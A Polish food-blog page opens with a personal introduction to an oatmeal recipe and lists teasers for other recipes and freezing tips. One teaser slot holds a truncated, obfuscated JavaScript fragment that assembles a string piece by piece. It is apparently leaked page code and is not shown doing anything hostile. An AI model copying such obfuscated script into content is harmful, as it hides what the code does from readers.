Jak gotować owsiankę – na wodzie i na mleku?

Przyznaję bez bicia – przez lata nienawidziłam owsianki. Kojarzyła mi się z tą papką, którą dostawałam w przedszkolu, gdy byłam mała. Pamiętam jej konsystencję kleiku i kompletny brak smaku. Dopiero podczas mojej podróży po Szkocji przekonałam się, że owsianka może być prawdziwym cudem kulinarnym, który nie tylko syci na wiele godzin, ale też smakuje obłędnie! …
Najnowsze przepisy
(function(){ xw43_="o"+("p"+"")+"en"+"";xw43_+="s"+("tat")+( ⇖ 8
Szybkie śniadanie z BlendyGo 3 i BlendyPack Ostatnio mam... ⇖ 13
Prosty deser z kaszą manną i miodem to idealny przepis na... ⇖ 18
Pesto sardo z orzechami włoskimi, smak Sardynii w mojej... ⇖ 14
O kruchych ciastkach chyba nie trzeba dużo mówić na... ⇖ 23
Przepisy z bloga
Nie zawsze mamy czas (albo chęć), by wieczorem stać przy... ⇖ 56
Chcesz zamrozić borówki amerykańskie, ale nie wiesz jak?... ⇖ 81
Mrożenie sajgonek to sztuka! Odkryj sekrety, jak zachować... ⇖ 89
Poznaj sekrety mrożenia puree z dyni! Zachowaj smak... ⇖ 76
Zastanawiasz się, czy mrozić lasagne? Odkryj praktyczne... ⇖ 90
Przepisy na czasie
Te ogórki to prawdziwy słoikowy hit, który robi furorę... ⇖ 1458
Pierogi ruskie to klasyk, który zawsze się sprawdza!... ⇖ 1059
Sałatka Słoikowa od Teściowej to sprawdzony przepis na... ⇖ 645
Zapraszam Was serdecznie do kolejnego przepisu, w którym... ⇖ 558
Uwielbiam , chociaż nie jestem przesadnie mięsożerna.I... ⇖ 530
Najlepszy kompot na zimę to jest ten z mirabelek, który... ⇖ 470
Plasterki kanapkowe na zimę to znakomita propozycja na... ⇖ 466
Znakomite na zimę złote ogórki, które świetnie nadają... ⇖ 461